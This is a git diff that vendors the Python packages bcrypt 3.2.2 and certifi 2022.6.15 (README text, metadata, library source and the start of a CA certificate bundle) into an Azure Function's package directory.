convenience method for verifying a password. +* Ensure that you get a ``$2y$`` hash when you input a ``$2y$`` salt. +* Fixed a regression where ``$2a`` hashes were vulnerable to a wraparound bug. +* Fixed compilation under Alpine Linux. + +3.0.0 +----- +* Switched the C backend to code obtained from the OpenBSD project rather than + openwall. +* Added support for ``bcrypt_pbkdf`` via the ``kdf`` function. + +2.0.0 +----- +* Added support for an adjustible prefix when calling ``gensalt``. +* Switched to CFFI 1.0+ + +Usage +----- + +Password Hashing +~~~~~~~~~~~~~~~~ + +Hashing and then later checking that a password matches the previous hashed +password is very simple: + +.. code:: pycon + + >>> import bcrypt + >>> password = b"super secret password" + >>> # Hash a password for the first time, with a randomly-generated salt + >>> hashed = bcrypt.hashpw(password, bcrypt.gensalt()) + >>> # Check that an unhashed password matches one that has previously been + >>> # hashed + >>> if bcrypt.checkpw(password, hashed): + ... print("It Matches!") + ... else: + ... print("It Does not Match :(") + +KDF +~~~ + +As of 3.0.0 ``bcrypt`` now offers a ``kdf`` function which does ``bcrypt_pbkdf``. +This KDF is used in OpenSSH's newer encrypted private key format. + +.. code:: pycon + + >>> import bcrypt + >>> key = bcrypt.kdf( + ... password=b'password', + ... salt=b'salt', + ... desired_key_bytes=32, + ... rounds=100) + + +Adjustable Work Factor +~~~~~~~~~~~~~~~~~~~~~~ +One of bcrypt's features is an adjustable logarithmic work factor. To adjust +the work factor merely pass the desired number of rounds to +``bcrypt.gensalt(rounds=12)`` which defaults to 12): + +.. code:: pycon + + >>> import bcrypt + >>> password = b"super secret password" + >>> # Hash a password for the first time, with a certain number of rounds + >>> hashed = bcrypt.hashpw(password, bcrypt.gensalt(14)) + >>> # Check that a unhashed password matches one that has previously been + >>> # hashed + >>> if bcrypt.checkpw(password, hashed): + ... print("It Matches!") + ... else: + ... print("It Does not Match :(") + + +Adjustable Prefix +~~~~~~~~~~~~~~~~~ + +Another one of bcrypt's features is an adjustable prefix to let you define what +libraries you'll remain compatible with. To adjust this, pass either ``2a`` or +``2b`` (the default) to ``bcrypt.gensalt(prefix=b"2b")`` as a bytes object. + +As of 3.0.0 the ``$2y$`` prefix is still supported in ``hashpw`` but deprecated. + +Maximum Password Length +~~~~~~~~~~~~~~~~~~~~~~~ + +The bcrypt algorithm only handles passwords up to 72 characters, any characters +beyond that are ignored. To work around this, a common approach is to hash a +password with a cryptographic hash (such as ``sha256``) and then base64 +encode it to prevent NULL byte problems before hashing the result with +``bcrypt``: + +.. code:: pycon + + >>> password = b"an incredibly long password" * 10 + >>> hashed = bcrypt.hashpw( + ... base64.b64encode(hashlib.sha256(password).digest()), + ... bcrypt.gensalt() + ... ) + +Compatibility +------------- + +This library should be compatible with py-bcrypt and it will run on Python +3.6+, and PyPy 3. + +C Code +------ + +This library uses code from OpenBSD. + +Security +-------- + +``bcrypt`` follows the `same security policy as cryptography`_, if you +identify a vulnerability, we ask you to contact us privately. + +.. _`same security policy as cryptography`: https://cryptography.io/en/latest/security.html +.. _`standard library`: https://docs.python.org/3/library/hashlib.html#hashlib.scrypt +.. _`argon2_cffi`: https://argon2-cffi.readthedocs.io +.. _`cryptography`: https://cryptography.io/en/latest/hazmat/primitives/key-derivation-functions/#cryptography.hazmat.primitives.kdf.scrypt.Scrypt + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/RECORD new file mode 100644 index 0000000..e97d0e8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/RECORD @@ -0,0 +1,14 @@ +bcrypt-3.2.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +bcrypt-3.2.2.dist-info/LICENSE,sha256=gXPVwptPlW1TJ4HSuG5OMPg-a3h43OGMkZRR1rpwfJA,10850 +bcrypt-3.2.2.dist-info/METADATA,sha256=8N_0mlqmjxBLT_9IIrIJ52PjeZfif62oFT6gtLc7BWc,8320 +bcrypt-3.2.2.dist-info/RECORD,, +bcrypt-3.2.2.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +bcrypt-3.2.2.dist-info/WHEEL,sha256=TIQeZFe3DwXBO5UGlCH1aKpf5Cx6FJLbIUqd-Sq2juI,185 +bcrypt-3.2.2.dist-info/top_level.txt,sha256=igJttN6fNWPEzk4lnCMzlitVT_1PlLVJzxzogMWGARU,15 +bcrypt/__about__.py,sha256=y3-LY1hqQ1KAVagHmhL_-VDEDf4r3LWt4HnGi6OCGmk,1320 +bcrypt/__init__.py,sha256=tr7xBv0w9ajqIHf8537qirLqM_bGOGM_lIQMjFd1PfI,5587 +bcrypt/__pycache__/__about__.cpython-39.pyc,, +bcrypt/__pycache__/__init__.cpython-39.pyc,, +bcrypt/_bcrypt.abi3.so,sha256=trqhBrLOWPP9HC_fwbcyEajpTBZLi0A6eSVjGkNAvu8,126504 +bcrypt/_bcrypt.pyi,sha256=TGNrzZD1NWdyeWGGJ2i3tj_HWg_YovqF-WdI7otmiIg,47 +bcrypt/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/REQUESTED b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/REQUESTED new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/WHEEL new file mode 100644 index 0000000..de7d6e2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/WHEEL @@ -0,0 +1,7 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: false +Tag: cp36-abi3-manylinux_2_17_x86_64 +Tag: cp36-abi3-manylinux2014_x86_64 +Tag: cp36-abi3-manylinux_2_24_x86_64 + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/top_level.txt new file mode 100644 index 0000000..87e2d76 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt-3.2.2.dist-info/top_level.txt @@ -0,0 +1,2 @@ +_bcrypt +bcrypt diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__about__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__about__.py new file mode 100644 index 0000000..21a5c56 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__about__.py @@ -0,0 +1,41 @@ +# Author:: Donald Stufft () +# Copyright:: Copyright (c) 2013 Donald Stufft +# License:: Apache License, Version 2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +from __future__ import absolute_import +from __future__ import division +from __future__ import unicode_literals + +__all__ = [ + "__title__", + "__summary__", + "__uri__", + "__version__", + "__author__", + "__email__", + "__license__", + "__copyright__", +] + +__title__ = "bcrypt" +__summary__ = "Modern password hashing for your software and your servers" +__uri__ = "https://github.com/pyca/bcrypt/" + +__version__ = "3.2.2" + +__author__ = "The Python Cryptographic Authority developers" +__email__ = "cryptography-dev@python.org" + +__license__ = "Apache License, Version 2.0" +__copyright__ = "Copyright 2013-2022 {0}".format(__author__) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__init__.py new file mode 100644 index 0000000..427ed37 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__init__.py @@ -0,0 +1,171 @@ +# Author:: Donald Stufft () +# Copyright:: Copyright (c) 2013 Donald Stufft +# License:: Apache License, Version 2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +from __future__ import absolute_import +from __future__ import division + +import hmac +import os +import re +import warnings + +from .__about__ import ( + __author__, + __copyright__, + __email__, + __license__, + __summary__, + __title__, + __uri__, + __version__, +) +from . import _bcrypt # noqa: I100 + + +__all__ = [ + "__title__", + "__summary__", + "__uri__", + "__version__", + "__author__", + "__email__", + "__license__", + "__copyright__", + "gensalt", + "hashpw", + "kdf", + "checkpw", +] + + +_normalize_re = re.compile(rb"^\$2y\$") + + +def gensalt(rounds: int = 12, prefix: bytes = b"2b") -> bytes: + if prefix not in (b"2a", b"2b"): + raise ValueError("Supported prefixes are b'2a' or b'2b'") + + if rounds < 4 or rounds > 31: + raise ValueError("Invalid rounds") + + salt = os.urandom(16) + output = _bcrypt.ffi.new("char[]", 30) + _bcrypt.lib.encode_base64(output, salt, len(salt)) + + return ( + b"$" + + prefix + + b"$" + + ("%2.2u" % rounds).encode("ascii") + + b"$" + + _bcrypt.ffi.string(output) + ) + + +def hashpw(password: bytes, salt: bytes) -> bytes: + if isinstance(password, str) or isinstance(salt, str): + raise TypeError("Strings must be encoded before hashing") + + if b"\x00" in password: + raise ValueError("password may not contain NUL bytes") + + # bcrypt originally suffered from a wraparound bug: + # http://www.openwall.com/lists/oss-security/2012/01/02/4 + # This bug was corrected in the OpenBSD source by truncating inputs to 72 + # bytes on the updated prefix $2b$, but leaving $2a$ unchanged for + # compatibility. However, pyca/bcrypt 2.0.0 *did* correctly truncate inputs + # on $2a$, so we do it here to preserve compatibility with 2.0.0 + password = password[:72] + + # When the original 8bit bug was found the original library we supported + # added a new prefix, $2y$, that fixes it. This prefix is exactly the same + # as the $2b$ prefix added by OpenBSD other than the name. Since the + # OpenBSD library does not support the $2y$ prefix, if the salt given to us + # is for the $2y$ prefix, we'll just mugne it so that it's a $2b$ prior to + # passing it into the C library. + original_salt, salt = salt, _normalize_re.sub(b"$2b$", salt) + + hashed = _bcrypt.ffi.new("char[]", 128) + retval = _bcrypt.lib.bcrypt_hashpass(password, salt, hashed, len(hashed)) + + if retval != 0: + raise ValueError("Invalid salt") + + # Now that we've gotten our hashed password, we want to ensure that the + # prefix we return is the one that was passed in, so we'll use the prefix + # from the original salt and concatenate that with the return value (minus + # the return value's prefix). This will ensure that if someone passed in a + # salt with a $2y$ prefix, that they get back a hash with a $2y$ prefix + # even though we munged it to $2b$. + return original_salt[:4] + _bcrypt.ffi.string(hashed)[4:] + + +def checkpw(password: bytes, hashed_password: bytes) -> bool: + if isinstance(password, str) or isinstance(hashed_password, str): + raise TypeError("Strings must be encoded before checking") + + if b"\x00" in password or b"\x00" in hashed_password: + raise ValueError( + "password and hashed_password may not contain NUL bytes" + ) + + ret = hashpw(password, hashed_password) + return hmac.compare_digest(ret, hashed_password) + + +def kdf( + password: bytes, + salt: bytes, + desired_key_bytes: int, + rounds: int, + ignore_few_rounds: bool = False, +) -> bytes: + if isinstance(password, str) or isinstance(salt, str): + raise TypeError("Strings must be encoded before hashing") + + if len(password) == 0 or len(salt) == 0: + raise ValueError("password and salt must not be empty") + + if desired_key_bytes <= 0 or desired_key_bytes > 512: + raise ValueError("desired_key_bytes must be 1-512") + + if rounds < 1: + raise ValueError("rounds must be 1 or more") + + if rounds < 50 and not ignore_few_rounds: + # They probably think bcrypt.kdf()'s rounds parameter is logarithmic, + # expecting this value to be slow enough (it probably would be if this + # were bcrypt). Emit a warning. + warnings.warn( + ( + "Warning: bcrypt.kdf() called with only {0} round(s). " + "This few is not secure: the parameter is linear, like PBKDF2." + ).format(rounds), + UserWarning, + stacklevel=2, + ) + + key = _bcrypt.ffi.new("uint8_t[]", desired_key_bytes) + res = _bcrypt.lib.bcrypt_pbkdf( + password, len(password), salt, len(salt), key, len(key), rounds + ) + _bcrypt_assert(res == 0) + + return _bcrypt.ffi.buffer(key, desired_key_bytes)[:] + + +def _bcrypt_assert(ok: bool) -> None: + if not ok: + raise SystemError("bcrypt assertion failed") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__pycache__/__about__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__pycache__/__about__.cpython-39.pyc new file mode 100644 index 0000000..f34f493 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__pycache__/__about__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..80be598 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/_bcrypt.abi3.so b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/_bcrypt.abi3.so new file mode 100644 index 0000000..c088107 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/_bcrypt.abi3.so differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/_bcrypt.pyi b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/_bcrypt.pyi new file mode 100644 index 0000000..1f0dddb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/_bcrypt.pyi @@ -0,0 +1,4 @@ +import typing + +ffi: typing.Any +lib: typing.Any diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bin/normalizer b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bin/normalizer new file mode 100644 index 0000000..c75ca8a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bin/normalizer @@ -0,0 +1,8 @@ +#!/usr/bin/python3 +# -*- coding: utf-8 -*- +import re +import sys +from charset_normalizer.cli.normalizer import cli_detect +if __name__ == '__main__': + sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0]) + sys.exit(cli_detect()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bin/pyjwt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bin/pyjwt new file mode 100644 index 0000000..7134bb1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bin/pyjwt @@ -0,0 +1,8 @@ +#!/usr/bin/python3 +# -*- coding: utf-8 -*- +import re +import sys +from jwt.__main__ import main +if __name__ == '__main__': + sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0]) + sys.exit(main()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/LICENSE new file mode 100644 index 0000000..f1392a9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/LICENSE @@ -0,0 +1,21 @@ +This package contains a modified version of ca-bundle.crt: + +ca-bundle.crt -- Bundle of CA Root Certificates + +Certificate data from Mozilla as of: Thu Nov 3 19:04:19 2011# +This is a bundle of X.509 certificates of public Certificate Authorities +(CA). These were automatically extracted from Mozilla's root certificates +file (certdata.txt). This file can be found in the mozilla source tree: +http://mxr.mozilla.org/mozilla/source/security/nss/lib/ckfw/builtins/certdata.txt?raw=1# +It contains the certificates in PEM format and therefore +can be directly used with curl / libcurl / php_curl, or with +an Apache+mod_ssl webserver for SSL client authentication. +Just configure this file as the SSLCACertificateFile.# + +***** BEGIN LICENSE BLOCK ***** +This Source Code Form is subject to the terms of the Mozilla Public License, +v. 2.0. If a copy of the MPL was not distributed with this file, You can obtain +one at http://mozilla.org/MPL/2.0/. + +***** END LICENSE BLOCK ***** +@(#) $RCSfile: certdata.txt,v $ $Revision: 1.80 $ $Date: 2011/11/03 15:11:58 $ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/METADATA new file mode 100644 index 0000000..b74868b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/METADATA @@ -0,0 +1,81 @@ +Metadata-Version: 2.1 +Name: certifi +Version: 2022.6.15 +Summary: Python package for providing Mozilla's CA Bundle. +Home-page: https://github.com/certifi/python-certifi +Author: Kenneth Reitz +Author-email: me@kennethreitz.com +License: MPL-2.0 +Project-URL: Source, https://github.com/certifi/python-certifi +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0) +Classifier: Natural Language :: English +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Requires-Python: >=3.6 +License-File: LICENSE + +Certifi: Python SSL Certificates +================================ + +Certifi provides Mozilla's carefully curated collection of Root Certificates for +validating the trustworthiness of SSL certificates while verifying the identity +of TLS hosts. It has been extracted from the `Requests`_ project. + +Installation +------------ + +``certifi`` is available on PyPI. Simply install it with ``pip``:: + + $ pip install certifi + +Usage +----- + +To reference the installed certificate authority (CA) bundle, you can use the +built-in function:: + + >>> import certifi + + >>> certifi.where() + '/usr/local/lib/python3.7/site-packages/certifi/cacert.pem' + +Or from the command line:: + + $ python -m certifi + /usr/local/lib/python3.7/site-packages/certifi/cacert.pem + +Enjoy! + +1024-bit Root Certificates +~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Browsers and certificate authorities have concluded that 1024-bit keys are +unacceptably weak for certificates, particularly root certificates. For this +reason, Mozilla has removed any weak (i.e. 1024-bit key) certificate from its +bundle, replacing it with an equivalent strong (i.e. 2048-bit or greater key) +certificate from the same CA. Because Mozilla removed these certificates from +its bundle, ``certifi`` removed them as well. + +In previous versions, ``certifi`` provided the ``certifi.old_where()`` function +to intentionally re-add the 1024-bit roots back into your bundle. This was not +recommended in production and therefore was removed at the end of 2018. + +.. _`Requests`: https://requests.readthedocs.io/en/master/ + +Addition/Removal of Certificates +-------------------------------- + +Certifi does not support any addition/removal or other modification of the +CA trust store content. This project is intended to provide a reliable and +highly portable root of trust to python deployments. Look to upstream projects +for methods to use alternate trust. + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/RECORD new file mode 100644 index 0000000..040bdbe --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/RECORD @@ -0,0 +1,14 @@ +certifi-2022.6.15.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +certifi-2022.6.15.dist-info/LICENSE,sha256=vp2C82ES-Hp_HXTs1Ih-FGe7roh4qEAEoAEXseR1o-I,1049 +certifi-2022.6.15.dist-info/METADATA,sha256=1sLjV7SjXkcGhJr631JUqCLCDnqgTyFoFe-tRLxakTE,2804 +certifi-2022.6.15.dist-info/RECORD,, +certifi-2022.6.15.dist-info/WHEEL,sha256=ewwEueio1C2XeHTvT17n8dZUJgOvyCWCt0WVNLClP9o,92 +certifi-2022.6.15.dist-info/top_level.txt,sha256=KMu4vUCfsjLrkPbSNdgdekS-pVJzBAJFO__nI8NF6-U,8 +certifi/__init__.py,sha256=SuZ3iYmzdRyUv-PiaZkquUgXtWZ16ICUKgymlEBspx0,94 +certifi/__main__.py,sha256=xBBoj905TUWBLRGANOcf7oi6e-3dMP4cEoG9OyMs11g,243 +certifi/__pycache__/__init__.cpython-39.pyc,, +certifi/__pycache__/__main__.cpython-39.pyc,, +certifi/__pycache__/core.cpython-39.pyc,, +certifi/cacert.pem,sha256=pZ_eiDoO-ddKudrQCWieABc9KFlbV0FsmLLugygMbkw,285222 +certifi/core.py,sha256=G5LqCBr4o8bozzzlYBE8nsd_ziB6XcxJiuMV4llFeYY,2515 +certifi/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/WHEEL new file mode 100644 index 0000000..725a409 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.0) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/top_level.txt new file mode 100644 index 0000000..acb5287 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/top_level.txt @@ -0,0 +1 @@ +certifi diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__init__.py new file mode 100644 index 0000000..4066cd4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__init__.py @@ -0,0 +1,4 @@ +from .core import contents, where + +__all__ = ["contents", "where"] +__version__ = "2022.06.15" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__main__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__main__.py new file mode 100644 index 0000000..6e0544c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__main__.py @@ -0,0 +1,12 @@ +import argparse + +from certifi import contents, where + +parser = argparse.ArgumentParser() +parser.add_argument("-c", "--contents", action="store_true") +args = parser.parse_args() + +if args.contents: + print(contents()) +else: + print(where()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..e4865fa Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/__main__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/__main__.cpython-39.pyc new file mode 100644 index 0000000..70566c7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/__main__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/core.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/core.cpython-39.pyc new file mode 100644 index 0000000..1f40347 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/core.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/cacert.pem b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/cacert.pem new file mode 100644 index 0000000..c92cc1d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/cacert.pem @@ -0,0 +1,4685 @@ + +# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA +# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA +# Label: "GlobalSign Root CA" +# Serial: 4835703278459707669005204 +# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a +# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c +# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99 +-----BEGIN CERTIFICATE----- +MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG +A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv +b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw +MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i +YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT +aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ +jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp +xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz8kHp +1Wrjsok6Vjk4bwY8iGlbKk3Fp1S4bInMm/k8yuX9ifUSPJJ4ltbcdG6TRGHRjcdG +snUOhugZitVtbNV4FpWi6cgKOOvyJBNPc1STE4U6G7weNLWLBYy5d4ux2x8gkasJ +U26Qzns3dLlwR5EiUWMWea6xrkEmCMgZK9FGqkjWZCrXgzT/LCrBbBlDSgeF59N8 +9iFo7+ryUp9/k5DPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8E +BTADAQH/MB0GA1UdDgQWBBRge2YaRQ2XyolQL30EzTSo//z9SzANBgkqhkiG9w0B +AQUFAAOCAQEA1nPnfE920I2/7LqivjTFKDK1fPxsnCwrvQmeU79rXqoRSLblCKOz +yj1hTdNGCbM+w6DjY1Ub8rrvrTnhQ7k4o+YviiY776BQVvnGCv04zcQLcFGUl5gE +38NflNUVyRRBnMRddWQVDf9VMOyGj/8N7yy5Y0b2qvzfvGn9LhJIZJrglfCm7ymP +AbEVtQwdpf5pLGkkeB6zpxxxYu7KyJesF12KwvhHhm4qxFYxldBniYUr+WymXUad +DKqC5JlR3XC321Y9YeRq4VzW9v493kHMB65jUr9TU/Qr6cf9tveCX4XSQRjbgbME +HMUfpIBvFSDJ3gyICh3WZlXi/EjJKSZp4A== +-----END CERTIFICATE----- + +# Issuer: CN=Entrust.net Certification Authority (2048) O=Entrust.net OU=www.entrust.net/CPS_2048 incorp. by ref. (limits liab.)/(c) 1999 Entrust.net Limited +# Subject: CN=Entrust.net Certification Authority (2048) O=Entrust.net OU=www.entrust.net/CPS_2048 incorp. by ref. (limits liab.)/(c) 1999 Entrust.net Limited +# Label: "Entrust.net Premium 2048 Secure Server CA" +# Serial: 946069240 +# MD5 Fingerprint: ee:29:31:bc:32:7e:9a:e6:e8:b5:f7:51:b4:34:71:90 +# SHA1 Fingerprint: 50:30:06:09:1d:97:d4:f5:ae:39:f7:cb:e7:92:7d:7d:65:2d:34:31 +# SHA256 Fingerprint: 6d:c4:71:72:e0:1c:bc:b0:bf:62:58:0d:89:5f:e2:b8:ac:9a:d4:f8:73:80:1e:0c:10:b9:c8:37:d2:1e:b1:77 +-----BEGIN CERTIFICATE----- +MIIEKjCCAxKgAwIBAgIEOGPe+DANBgkqhkiG9w0BAQUFADCBtDEUMBIGA1UEChML 